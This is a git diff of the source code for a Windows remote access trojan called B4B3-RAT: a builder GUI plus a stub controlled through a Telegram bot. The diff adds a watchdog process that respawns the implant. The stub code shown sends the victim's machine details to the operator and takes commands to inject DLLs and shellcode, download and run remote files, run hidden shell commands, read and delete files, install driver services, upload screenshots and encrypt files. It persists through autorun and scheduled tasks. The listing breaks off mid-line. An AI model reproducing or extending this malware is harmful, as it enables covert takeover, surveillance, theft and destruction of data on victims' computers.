diff --git a/B4B3-RAT/Builder/Builder.cpp b/B4B3-RAT/Builder/Builder.cpp index 37e7ea8..f737283 100644 --- a/B4B3-RAT/Builder/Builder.cpp +++ b/B4B3-RAT/Builder/Builder.cpp @@ -41,17 +41,19 @@ BOOL Builder::MakeFile(const char* stub, const char* output, Builder::Settings* f_out.write((char*)&s->chatid, sizeof(s->chatid)); f_out.write((char*)&s->drop, sizeof(s->drop)); - f_out.write((char*)&s->drop_run, sizeof(bool)); + f_out.write((char*)&s->drop_run, sizeof(s->drop_run)); f_out.write((char*)&s->scheduler_name, sizeof(s->scheduler_name)); - f_out.write((char*)&s->scheduler_state, sizeof(bool)); + f_out.write((char*)&s->scheduler_state, sizeof(s->scheduler_state)); f_out.write((char*)&s->client_delay, sizeof(s->client_delay)); f_out.write((char*)&s->autorun, sizeof(s->autorun)); - f_out.write((char*)&s->autorun_state, sizeof(bool)); + f_out.write((char*)&s->autorun_state, sizeof(s->autorun_state)); - f_out.write((char*)&s->auto_delete, sizeof(bool)); - f_out.write((char*)&s->protector, sizeof(bool)); + f_out.write((char*)&s->auto_delete, sizeof(s->auto_delete)); + f_out.write((char*)&s->protector, sizeof(s->protector)); + + f_out.write((char*)&s->protectorName, sizeof(s->protectorName)); f_out.close(); diff --git a/B4B3-RAT/Builder/Builder.h b/B4B3-RAT/Builder/Builder.h index 9a2d008..3d5034a 100644 --- a/B4B3-RAT/Builder/Builder.h +++ b/B4B3-RAT/Builder/Builder.h @@ -37,15 +37,17 @@ namespace Builder { char drop[128] = { 0 }; bool drop_run; - char scheduler_name[128] = { 0 }; + char scheduler_name[50] = { 0 }; bool scheduler_state; char autorun[128] = { 0 }; bool autorun_state; - char client_delay[128] = { 0 }; + char client_delay[10] = { 0 }; bool auto_delete; + bool protector; + char protectorName[50] = { 0 }; }; #pragma pack(pop) diff --git a/B4B3-RAT/Builder/Builder.rc b/B4B3-RAT/Builder/Builder.rc index ad04033..07c5601 100644 --- a/B4B3-RAT/Builder/Builder.rc +++ b/B4B3-RAT/Builder/Builder.rc @@ -50,7 +50,7 @@ END // Dialog // -IDD_DIALOGBAR DIALOGEX 0, 0, 277, 259 +IDD_DIALOGBAR DIALOGEX 0, 0, 277, 277 STYLE DS_SETFONT | DS_3DLOOK | DS_FIXEDSYS | DS_CENTERMOUSE | WS_POPUP | WS_BORDER FONT 8, "MS Shell Dlg", 400, 0, 0x0 BEGIN @@ -63,22 +63,24 @@ BEGIN EDITTEXT IDC_EDIT1,113,31,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE EDITTEXT IDC_EDIT2,113,45,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE EDITTEXT IDC_EDIT3,113,60,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE - CTEXT "Make my RAT",IDC_STATIC3,8,225,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE - LTEXT "Enter the drop path:",IDC_STATIC,19,168,67,8 - EDITTEXT IDC_EDIT4,113,167,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE + CTEXT "Make my RAT",IDC_STATIC3,8,240,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE + LTEXT "Enter the drop path:",IDC_STATIC,19,186,67,8 + EDITTEXT IDC_EDIT4,113,185,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE LTEXT "Client delay (m/s):*",IDC_STATIC,8,77,67,8 EDITTEXT IDC_EDIT5,113,76,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE - CONTROL "Auto delete yourself before run",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,185,118,10 - CONTROL "Write yourself in autorun",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,93,97,10 - LTEXT "Enter the name in autorun:",IDC_STATIC,19,106,90,8 - EDITTEXT IDC_EDIT6,113,105,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE + CONTROL "Auto delete yourself before run",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,203,118,10 + CONTROL "Write yourself in autorun",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,111,97,10 + LTEXT "Enter the name in autorun:",IDC_STATIC,19,124,90,8 + EDITTEXT IDC_EDIT6,113,123,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE CONTROL "Drop and run yourself from [DROP PATH]",IDC_CHECK3, - "Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,153,151,10 - CONTROL "Anti-debuggers, anti-analysis",IDC_CHECK4,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,203,111,10 - CTEXT "Test BOT API (Show commands)",IDC_STATIC4,137,225,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE - CONTROL "Write yourself in task scheduler",IDC_CHECK5,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,122,119,10 - LTEXT "Enter the name in taskschd:",IDC_STATIC,19,136,92,8 - EDITTEXT IDC_EDIT7,113,135,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE + "Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,171,151,10 + CONTROL "Anti-debuggers, anti-analysis",IDC_CHECK4,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,221,111,10 + CTEXT "Test BOT API (Show commands)",IDC_STATIC4,137,240,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE + CONTROL "Write yourself in task scheduler",IDC_CHECK5,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,140,119,10 + LTEXT "Enter the name in taskschd:",IDC_STATIC,19,154,92,8 + EDITTEXT IDC_EDIT7,113,153,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE + LTEXT "Enter spy process name:",IDC_STATIC,8,94,82,8 + EDITTEXT IDC_EDIT8,113,93,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE END @@ -97,6 +99,7 @@ BEGIN VERTGUIDE, 113 VERTGUIDE, 137 VERTGUIDE, 266 + BOTTOMMARGIN, 268 HORZGUIDE, 16 HORZGUIDE, 31 HORZGUIDE, 253 diff --git a/B4B3-RAT/Builder/DlgProc.cpp b/B4B3-RAT/Builder/DlgProc.cpp index ac63cc9..147b1c1 100644 --- a/B4B3-RAT/Builder/DlgProc.cpp +++ b/B4B3-RAT/Builder/DlgProc.cpp @@ -80,21 +80,22 @@ INT_PTR DlgProc::DlgMain(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { case IDC_STATIC3: { Builder::Settings s; - GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT1), s.botapi, 127); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT1), s.botapi, (sizeof(s.botapi) - 1)); strcpy(s.key, Manager::RandomStr(CryptoPP::AES::DEFAULT_KEYLENGTH).c_str()); strcpy(s.botapi, Manager::EncryptStr(s.botapi, s.key).c_str()); - GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT2), s.chatid, 127); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT2), s.chatid, (sizeof(s.chatid) - 1)); INT TextLen = GetWindowTextLengthA(GetDlgItem(hWnd, IDC_EDIT3)) + 1; char* buff = new char[TextLen]; GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT3), buff, TextLen); - GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT4), s.drop, 127); - GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT5), s.client_delay, 127); - GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT6), s.autorun, 127); - GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT7), s.scheduler_name, 127); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT4), s.drop, (sizeof(s.drop) - 1)); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT5), s.client_delay, (sizeof(s.client_delay) - 1)); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT6), s.autorun, (sizeof(s.autorun) - 1)); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT7), s.scheduler_name, (sizeof(s.scheduler_name) - 1)); + GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT8), s.protectorName, (sizeof(s.protectorName) - 1)); UINT State = SendMessage(GetDlgItem(hWnd, IDC_CHECK1), BM_GETCHECK, 0, 0); if (State == BST_CHECKED) { diff --git a/B4B3-RAT/Builder/resource.h b/B4B3-RAT/Builder/resource.h index d124019..b9db400 100644 --- a/B4B3-RAT/Builder/resource.h +++ b/B4B3-RAT/Builder/resource.h @@ -19,6 +19,7 @@ #define IDC_CHECK4 1014 #define IDC_CHECK5 1015 #define IDC_EDIT7 1016 +#define IDC_EDIT8 1017 // Next default values for new objects // diff --git a/B4B3-RAT/Stub/Information.cpp b/B4B3-RAT/Stub/Information.cpp index b0c2c12..f4586cb 100644 --- a/B4B3-RAT/Stub/Information.cpp +++ b/B4B3-RAT/Stub/Information.cpp @@ -29,7 +29,7 @@ std::string Information::GetOS() { OSVERSIONINFO vi; vi.dwOSVersionInfoSize = sizeof(vi); if (GetVersionEx(&vi) == 0) - return "Error getting "; + return "Unknown OS"; if (vi.dwMajorVersion == 10 && vi.dwMinorVersion == 0) { return "Windows 10"; diff --git a/B4B3-RAT/Stub/Manager.cpp b/B4B3-RAT/Stub/Manager.cpp index f098dd0..94563cb 100644 --- a/B4B3-RAT/Stub/Manager.cpp +++ b/B4B3-RAT/Stub/Manager.cpp @@ -39,17 +39,19 @@ void Manager::ReadData(Settings* s) { stub.read((char*)&s->chatid, sizeof(s->chatid)); stub.read((char*)&s->drop, sizeof(s->drop)); - stub.read((char*)&s->drop_run, sizeof(bool)); + stub.read((char*)&s->drop_run, sizeof(s->drop_run)); stub.read((char*)&s->scheduler_name, sizeof(s->scheduler_name)); - stub.read((char*)&s->scheduler_state, sizeof(bool)); + stub.read((char*)&s->scheduler_state, sizeof(s->scheduler_state)); stub.read((char*)&s->client_delay, sizeof(s->client_delay)); stub.read((char*)&s->autorun, sizeof(s->autorun)); - stub.read((char*)&s->autorun_state, sizeof(bool)); + stub.read((char*)&s->autorun_state, sizeof(s->autorun_state)); - stub.read((char*)&s->auto_delete, sizeof(bool)); - stub.read((char*)&s->protector, sizeof(bool)); + stub.read((char*)&s->auto_delete, sizeof(s->auto_delete)); + + stub.read((char*)&s->protector, sizeof(s->protector)); + stub.read((char*)&s->protectorName, sizeof(s->protectorName)); stub.close(); } @@ -65,14 +67,13 @@ void Manager::Autorun(const char* path, const char* name) { } void Manager::Scheduler(const char* path, const char* name) { - std::ofstream schd("scheduler.bat"); + std::ofstream schd(BAT_SCHD); schd << "@echo off \n"; schd << "SCHTASKS /CREATE /SC ONLOGON /TN \"" + std::string(name) + "\" /TR \"" + std::string(path); + schd << "DEL" BAT_SCHD; schd.close(); - ShellExecuteA(0, "open", "scheduler.bat", 0, 0, SW_HIDE); - Sleep(2000); - DeleteFileA("scheduler.bat"); + ShellExecuteA(0, "open", BAT_SCHD, 0, 0, SW_HIDE); } long Manager::GetFileSize(const char* filename) { diff --git a/B4B3-RAT/Stub/Manager.h b/B4B3-RAT/Stub/Manager.h index daabdf7..0ad455e 100644 --- a/B4B3-RAT/Stub/Manager.h +++ b/B4B3-RAT/Stub/Manager.h @@ -27,6 +27,10 @@ SOFTWARE. #define MANAGER_H #include "common.h" +#define BAT_EXTERNAL "RunExternal.bat" +#define BAT_SCHD "C:\\Users\\scheduler.bat" +#define BAT_AUTODEL "C:\\Users\\system.bat" + namespace Manager { #pragma pack(push, 1) struct Settings { @@ -37,15 +41,17 @@ namespace Manager { char drop[128] = { 0 }; bool drop_run; - char scheduler_name[128] = { 0 }; + char scheduler_name[50] = { 0 }; bool scheduler_state; char autorun[128] = { 0 }; bool autorun_state; - char client_delay[128] = { 0 }; + char client_delay[10] = { 0 }; bool auto_delete; + bool protector; + char protectorName[50] = { 0 }; }; #pragma pack(pop) @@ -57,7 +63,6 @@ namespace Manager { long GetFileSize(const char* filename); bool FileExists(std::string name); - std::string ToLower(std::string str); std::vector split(std::string str, char delim); std::string EncryptStr(std::string text, std::string key); diff --git a/B4B3-RAT/Stub/Protector.cpp b/B4B3-RAT/Stub/Protector.cpp index 4cfbd7a..942e5cc 100644 --- a/B4B3-RAT/Stub/Protector.cpp +++ b/B4B3-RAT/Stub/Protector.cpp @@ -83,4 +83,30 @@ void Protector::AntiProcesses() { } Sleep(3000); } -} \ No newline at end of file +} + +void Protector::SpyProcess(_SpyProcess* SP) { + HANDLE hSnap = NULL; + PROCESSENTRY32 pe32; + pe32.dwSize = sizeof(PROCESSENTRY32); + + std::string process = ""; + while (true) { + bool founded = false; + hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hSnap != NULL) { + if (Process32First(hSnap, &pe32)) { + do { + if (std::string(pe32.szExeFile).find(SP->procName) != std::string::npos) { + founded = true; + } + } while (Process32Next(hSnap, &pe32)); + } + } + + if (!founded) + ShellExecuteA(0, "open", SP->procPath, "protected", 0, SW_HIDE); + + Sleep(1000); + } +} diff --git a/B4B3-RAT/Stub/Protector.h b/B4B3-RAT/Stub/Protector.h index 3a0a7b8..7bcb3ce 100644 --- a/B4B3-RAT/Stub/Protector.h +++ b/B4B3-RAT/Stub/Protector.h @@ -29,6 +29,13 @@ SOFTWARE. namespace Protector { void AntiProcesses(); + + struct _SpyProcess { + char* procName; + char* procPath; + }; + + void SpyProcess(_SpyProcess* SP); } #endif \ No newline at end of file diff --git a/B4B3-RAT/Stub/WinMain.cpp b/B4B3-RAT/Stub/WinMain.cpp index 2e7a81c..aee13d7 100644 --- a/B4B3-RAT/Stub/WinMain.cpp +++ b/B4B3-RAT/Stub/WinMain.cpp @@ -75,14 +75,13 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) { ShellExecuteA(0, "open", s.drop, 0, 0, SW_HIDE); if (s.auto_delete) { - std::string batch_autodel = "C:\\Users\\system.bat"; - std::ofstream bat(batch_autodel); + std::ofstream bat(BAT_AUTODEL); bat << "@echo off\n"; bat << "del " + std::string(me); - bat << "\ndel " + batch_autodel; + bat << "\ndel " BAT_AUTODEL; bat.close(); - ShellExecuteA(0, "open", batch_autodel.c_str(), 0, 0, SW_HIDE); + ShellExecuteA(0, "open", BAT_AUTODEL, 0, 0, SW_HIDE); } return 0; @@ -97,324 +96,352 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, INT) { else { RegCloseKey(hKey); - strcpy(s.botapi, Manager::DecryptStr(s.botapi, s.key).c_str()); - if (s.botapi == "") { - ExitProcess(0); + char* buf = GetCommandLineA(); + std::vector spLine = Manager::split(buf, ' '); + + if (spLine.size() > 2) { + Protector::_SpyProcess SP; + SP.procName = (char*)spLine[1].c_str(); + SP.procPath = (char*)spLine[2].c_str(); + + CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Protector::SpyProcess, (LPVOID)&SP, 0, 0); + while (true) { + Sleep(1000); + } } + else { + if (spLine[1] != "protected") { + char procName[128], procPath[128]; - Telegram api(s.botapi); - BotNet botnet; + GetModuleBaseNameA(GetCurrentProcess(), 0, procName, sizeof(buf)); + GetModuleFileNameA(0, procPath, sizeof(procPath)); + strcat(procName, ".exe"); - SYSTEM_INFO SysInfo; - GetSystemInfo(&SysInfo); + CopyFileA(procPath, s.protectorName, FALSE); - if (s.protector) { - CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Protector::AntiProcesses, 0, 0, 0); - } + std::string arg = std::string(procName) + " " + procPath; + ShellExecuteA(0, "open", s.protectorName, arg.c_str(), 0, SW_HIDE); + } - int ID = rand(); - std::string information = "User ID: " + std::to_string(ID) + - "%0A%0A- Global information:" + - "%0AName: " + Information::GetPCName() + - "%0AIP: " + Information::GetIP() + - "%0AOS: " + Information::GetOS() + - "%0A%0A- Hardware information: " + - "%0AOEM ID: " + std::to_string(SysInfo.dwOemId) + - "%0ANum of processors: " + std::to_string(SysInfo.dwNumberOfProcessors) + - "%0APage size: " + std::to_string(SysInfo.dwProcessorType) + - "%0AProcessor: " + Information::GetProcessorBrand() + - "%0A%0AFor send command to this user, type: /user" + std::to_string(ID) + " [command]" - "%0A%0AP.S: To show commands: click on \"Test BOT API\" in B4B3-RAT Builder."; - api.SendTextMessage(s.chatid, information.c_str()); - - std::string last; - std::string prefix = "/user" + std::to_string(ID) + " "; - - std::vector params; - while (true) { - Sleep(atoi(s.client_delay)); - - last = api.GetLastMessageText(atoi(s.chatid)); - - if (last.substr(0, prefix.size()) == prefix) { - std::string command = last.replace(last.find(prefix), prefix.size(), ""); - params = Manager::split(command, ' '); - - // PROCESS MANAGER - // processes - if (command == "processes") { - std::string processes = ProcessManager::ProcessList(); - if (processes != "") { - api.SendTextMessage(s.chatid, processes.c_str()); - } - else { - api.SendTextMessage(s.chatid, "Error! Processes is empty"); - } - } + strcpy(s.botapi, Manager::DecryptStr(s.botapi, s.key).c_str()); + if (s.botapi == "") { + ExitProcess(0); + } - // closeproc process.exe - else if (params[0] == "closeproc") { - if (ProcessManager::CloseProcess(params[1])) { - api.SendTextMessage(s.chatid, "Success! Process has been closed"); - } - else { - api.SendTextMessage(s.chatid, "Error! Process isn't closed"); - } - } + Telegram api(s.botapi); + BotNet botnet; - else if (params[0] == "inject_dll") { - if (ProcessManager::InjectDLL(params[1].c_str(), params[2].c_str())) { - api.SendTextMessage(s.chatid, "Success! DLL has been injected"); - } - else { - api.SendTextMessage(s.chatid, "Error! DLL isn't injected"); - } - } + SYSTEM_INFO SysInfo; + GetSystemInfo(&SysInfo); + + if (s.protector) { + CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Protector::AntiProcesses, 0, 0, 0); + } - // inject_shell - else if (params[0] == "inject_shell") { - DWORD pid = ProcessManager::PIDByName(params[1]); - if (pid != 0) { - if (ProcessManager::InjectShell(pid, params[2])) { - api.SendTextMessage(s.chatid, "Success! Shellcode is injected"); + int ID = rand(); + std::string information = "User ID: " + std::to_string(ID) + + "%0A%0A- Global information:" + + "%0AName: " + Information::GetPCName() + + "%0AIP: " + Information::GetIP() + + "%0AOS: " + Information::GetOS() + + "%0A%0A- Hardware information: " + + "%0AOEM ID: " + std::to_string(SysInfo.dwOemId) + + "%0ANum of processors: " + std::to_string(SysInfo.dwNumberOfProcessors) + + "%0APage size: " + std::to_string(SysInfo.dwProcessorType) + + "%0AProcessor: " + Information::GetProcessorBrand() + + "%0A%0AFor send command to this user, type: /user" + std::to_string(ID) + " [command]" + "%0A%0AP.S: To show commands: click on \"Test BOT API\" in B4B3-RAT Builder."; + api.SendTextMessage(s.chatid, information.c_str()); + + std::string last; + std::string prefix = "/user" + std::to_string(ID) + " "; + + std::vector params; + while (true) { + Sleep(atoi(s.client_delay)); + + last = api.GetLastMessageText(atoi(s.chatid)); + + if (last.substr(0, prefix.size()) == prefix) { + std::string command = last.replace(last.find(prefix), prefix.size(), ""); + params = Manager::split(command, ' '); + + // PROCESS MANAGER + // processes + if (command == "processes") { + std::string processes = ProcessManager::ProcessList(); + if (processes != "") { + api.SendTextMessage(s.chatid, processes.c_str()); } else { - api.SendTextMessage(s.chatid, "Error! Shellcode isn't injected"); + api.SendTextMessage(s.chatid, "Error! Processes is empty"); } } - else { - api.SendTextMessage(s.chatid, "Error! Process not found"); - } - } - - // AUXILIARY - // loader https://google.com C:\File.exe - else if (params[0] == "loader") { - URLDownloadToFileA(0, params[1].c_str(), params[2].c_str(), 0, 0); - if (Manager::FileExists(params[2])) { - std::string text = "Success! File is uploaded to: " + params[2]; - api.SendTextMessage(s.chatid, text.c_str()); - } - else { - api.SendTextMessage(s.chatid, "Error! File not uploaded!"); - } - } - // run C:\File.exe - else if (params[0] == "run") { - if (params.size() == 2) { - ShellExecuteA(0, "open", params[1].c_str(), params[2].c_str(), 0, 0); - api.SendTextMessage(s.chatid, "Success! Runned with arguments"); - } - else { - ShellExecuteA(0, "open", params[1].c_str(), 0, 0, 0); - api.SendTextMessage(s.chatid, "Success! Runned without arguments"); + // closeproc process.exe + else if (params[0] == "closeproc") { + if (ProcessManager::CloseProcess(params[1])) { + api.SendTextMessage(s.chatid, "Success! Process has been closed"); + } + else { + api.SendTextMessage(s.chatid, "Error! Process isn't closed"); + } } - } - - // JOKES - // disable pc - else if (command == "disable pc") { - system("shutdown -s"); - } - - // close - else if (command == "close") { - ExitProcess(0); - } - - // disable display - else if (command == "disable display") { - SendMessage(NULL, WM_SYSCOMMAND, SC_MONITORPOWER, 2); - } - // FILE MANAGER - // 0 1 2 3 - // dir param C:\Folder [If write: text] - else if (params[0] == "dir") { - // if need del_file - if (params[1] == "del_file") { - if (DeleteFileA(params[2].c_str())) { - api.SendTextMessage(s.chatid, "Success! File deleted"); + else if (params[0] == "inject_dll") { + if (ProcessManager::InjectDLL(params[1].c_str(), params[2].c_str())) { + api.SendTextMessage(s.chatid, "Success! DLL has been injected"); } else { - api.SendTextMessage(s.chatid, "Error! File was not deleted"); + api.SendTextMessage(s.chatid, "Error! DLL isn't injected"); } } - // if show - else if (params[1] == "show") { - std::string objects = FileManager::DirectoryObjectsList(params[2]); - if (objects != "") { - api.SendTextMessage(s.chatid, objects.c_str()); + // inject_shell + else if (params[0] == "inject_shell") { + DWORD pid = ProcessManager::PIDByName(params[1]); + if (pid != 0) { + if (ProcessManager::InjectShell(pid, params[2])) { + api.SendTextMessage(s.chatid, "Success! Shellcode is injected"); + } + else { + api.SendTextMessage(s.chatid, "Error! Shellcode isn't injected"); + } } else { - api.SendTextMessage(s.chatid, "Error! Files not found!"); + api.SendTextMessage(s.chatid, "Error! Process not found"); } } - else if (params[1] == "read") { - std::string text = FileManager::ReadFile(params[2]); - if (text != "") { + // AUXILIARY + // loader https://google.com C:\File.exe + else if (params[0] == "loader") { + URLDownloadToFileA(0, params[1].c_str(), params[2].c_str(), 0, 0); + if (Manager::FileExists(params[2])) { + std::string text = "Success! File is uploaded to: " + params[2]; api.SendTextMessage(s.chatid, text.c_str()); } else { - api.SendTextMessage(s.chatid, "Error! File was not readed"); + api.SendTextMessage(s.chatid, "Error! File not uploaded!"); } } - else if (params[1] == "write") { - // dir write C:\path\to\text.txt text example - to - Text - std::string write_text = command.replace(0, command.find(params[2]) + params[2].length() + 1, ""); - if (FileManager::WriteFile(params[2], write_text)) { - api.SendTextMessage(s.chatid, "Success! Text is written"); + // run C:\File.exe + else if (params[0] == "run") { + if (params.size() == 2) { + ShellExecuteA(0, "open", params[1].c_str(), params[2].c_str(), 0, 0); + api.SendTextMessage(s.chatid, "Success! Runned with arguments"); } else { - api.SendTextMessage(s.chatid, "Error! Text was not written"); + ShellExecuteA(0, "open", params[1].c_str(), 0, 0, 0); + api.SendTextMessage(s.chatid, "Success! Runned without arguments"); } } - } - // SERVICE MANAGER - else if (params[0] == "service") { - // service show - if (params[1] == "show") { - std::string services = ServiceManager::ServiceList(); - if (services != "") { - api.SendTextMessage(s.chatid, services.c_str()); + // JOKES + // disable pc + else if (command == "disable pc") { + system("shutdown -s"); + } + + // close + else if (command == "close") { + ExitProcess(0); + } + + // disable display + else if (command == "disable display") { + SendMessage(NULL, WM_SYSCOMMAND, SC_MONITORPOWER, 2); + } + + // FILE MANAGER + // 0 1 2 3 + // dir param C:\Folder [If write: text] + else if (params[0] == "dir") { + // if need del_file + if (params[1] == "del_file") { + if (DeleteFileA(params[2].c_str())) { + api.SendTextMessage(s.chatid, "Success! File deleted"); + } + else { + api.SendTextMessage(s.chatid, "Error! File was not deleted"); + } } - else { - api.SendTextMessage(s.chatid, "Error! Services is empty"); + + // if show + else if (params[1] == "show") { + std::string objects = FileManager::DirectoryObjectsList(params[2]); + if (objects != "") { + api.SendTextMessage(s.chatid, objects.c_str()); + } + else { + api.SendTextMessage(s.chatid, "Error! Files not found!"); + } } - } - // 1 2 3 4 5 6 - // add [Name] [DisplayName] [C:\\ProgramData\\yourdriver.sys] [Type-Driver] [Start-Type] - else if (params[1] == "add") { - DWORD Type = ServiceManager::ParseTypeDriver(params[5]); - DWORD StartType = ServiceManager::ParseStartTypeDriver(params[6]); + else if (params[1] == "read") { + std::string text = FileManager::ReadFile(params[2]); + if (text != "") { + api.SendTextMessage(s.chatid, text.c_str()); + } + else { + api.SendTextMessage(s.chatid, "Error! File was not readed"); + } + } - if (Type == 0 || StartType == 0) { - api.SendTextMessage(s.chatid, "Error! Service not added"); + else if (params[1] == "write") { + // dir write C:\path\to\text.txt text example - to - Text + std::string write_text = command.replace(0, command.find(params[2]) + params[2].length() + 1, ""); + if (FileManager::WriteFile(params[2], write_text)) { + api.SendTextMessage(s.chatid, "Success! Text is written"); + } + else { + api.SendTextMessage(s.chatid, "Error! Text was not written"); + } } - else { - if (ServiceManager::AddSvc(params[2], params[3], params[4], Type, StartType)) { - api.SendTextMessage(s.chatid, "Success! Service has been added"); + } + + // SERVICE MANAGER + else if (params[0] == "service") { + // service show + if (params[1] == "show") { + std::string services = ServiceManager::ServiceList(); + if (services != "") { + api.SendTextMessage(s.chatid, services.c_str()); } else { + api.SendTextMessage(s.chatid, "Error! Services is empty"); + } + } + + // 1 2 3 4 5 6 + // add [Name] [DisplayName] [C:\\ProgramData\\yourdriver.sys] [Type-Driver] [Start-Type] + else if (params[1] == "add") { + DWORD Type = ServiceManager::ParseTypeDriver(params[5]); + DWORD StartType = ServiceManager::ParseStartTypeDriver(params[6]); + + if (Type == 0 || StartType == 0) { api.SendTextMessage(s.chatid, "Error! Service not added"); } + else { + if (ServiceManager::AddSvc(params[2], params[3], params[4], Type, StartType)) { + api.SendTextMessage(s.chatid, "Success! Service has been added"); + } + else { + api.SendTextMessage(s.chatid, "Error! Service not added"); + } + } } - } - // 1 2 - // delete [Name] - else if (params[1] == "delete") { - if (ServiceManager::DeleteSvc(params[2])) { - api.SendTextMessage(s.chatid, "Success! Service has been deleted"); + // 1 2 + // delete [Name] + else if (params[1] == "delete") { + if (ServiceManager::DeleteSvc(params[2])) { + api.SendTextMessage(s.chatid, "Success! Service has been deleted"); + } + else { + api.SendTextMessage(s.chatid, "Error! Service not deleted"); + } } - else { - api.SendTextMessage(s.chatid, "Error! Service not deleted"); + + // 1 2 + // start [Name] + else if (params[1] == "start") { + if (ServiceManager::StartSvc(params[2])) { + api.SendTextMessage(s.chatid, "Success! Service has been started"); + } + else { + api.SendTextMessage(s.chatid, "Error! Service not started"); + } + } + + // 1 2 + // stop [Name] + else if (params[1] == "stop") { + if (ServiceManager::StopSvc(params[2])) { + api.SendTextMessage(s.chatid, "Success! Service has been stopped"); + } + else { + api.SendTextMessage(s.chatid, "Error! Service not stopped"); + } } } - // 1 2 - // start [Name] - else if (params[1] == "start") { - if (ServiceManager::StartSvc(params[2])) { - api.SendTextMessage(s.chatid, "Success! Service has been started"); + // SYSTEM + else if (params[0] == "system") { + // Deleted Delete --- this cmd --- + // user[ID] system ping google.com + try { + std::string cmd = command.replace(command.find("system "), 7, ""); + + char windir[128] = { 0 }; + if (GetWindowsDirectoryA(windir, sizeof(windir) - 1) != 0) { + ShellExecuteA(NULL, "open", std::string(std::string(windir) + "\\System32\\cmd.exe").c_str(), cmd.c_str(), 0, SW_HIDE); + api.SendTextMessage(s.chatid, "Success! Command is runned"); + } + else { + api.SendTextMessage(s.chatid, "Error! Windows directory is null"); + } } - else { - api.SendTextMessage(s.chatid, "Error! Service not started"); + catch (std::exception) { + api.SendTextMessage(s.chatid, "Error! Recheck the parameters"); } } - // 1 2 - // stop [Name] - else if (params[1] == "stop") { - if (ServiceManager::StopSvc(params[2])) { - api.SendTextMessage(s.chatid, "Success! Service has been stopped"); + // SCREENSHOT + else if (params[0] == "screenshot") { + std::string filename = std::to_string(rand()) + ".jpeg"; + + if (ScreenTool::GDIScreen(filename)) { + std::string url = PrntSc::UploadImage("B4DB4B3", filename.c_str()); + api.SendTextMessage(s.chatid, url.c_str()); + + DeleteFileA(filename.c_str()); } else { - api.SendTextMessage(s.chatid, "Error! Service not stopped"); + api.SendTextMessage(s.chatid, "Error! Screenshot was not created"); } } - } - // SYSTEM - else if (params[0] == "system") { - // Deleted Delete --- this cmd --- - // user[ID] system ping google.com - try { - std::string cmd = command.replace(command.find("system "), 7, ""); - - char windir[128] = { 0 }; - if (GetWindowsDirectoryA(windir, sizeof(windir) - 1) != 0) { - ShellExecuteA(NULL, "open", std::string(std::string(windir) + "\\System32\\cmd.exe").c_str(), cmd.c_str(), 0, SW_HIDE); - api.SendTextMessage(s.chatid, "Success! Command is runned"); + // FILE CRYPTOR + else if (params[0] == "filecrypt") { + if (FileCryptor::FileCrypt(params[1], params[2])) { + api.SendTextMessage(s.chatid, "Success! File crypted"); } else { - api.SendTextMessage(s.chatid, "Error! Windows directory is null"); + api.SendTextMessage(s.chatid, "Error! File not crypted. Maybe, file not found?"); } } - catch (std::exception) { - api.SendTextMessage(s.chatid, "Error! Recheck the parameters"); - } - } - // SCREENSHOT - else if (params[0] == "screenshot") { - std::string filename = std::to_string(rand()) + ".jpeg"; - - if (ScreenTool::GDIScreen(filename)) { - std::string url = PrntSc::UploadImage("B4DB4B3", filename.c_str()); - api.SendTextMessage(s.chatid, url.c_str()); - - DeleteFileA(filename.c_str()); - } - else { - api.SendTextMessage(s.chatid, "Error! Screenshot was not created"); + else if (params[0] == "filedecrypt") { + if (FileCryptor::FileDecrypt(params[1], params[2])) { + api.SendTextMessage(s.chatid, "Success! File decrypted"); + } + else { + api.SendTextMessage(s.chatid, "Error! File 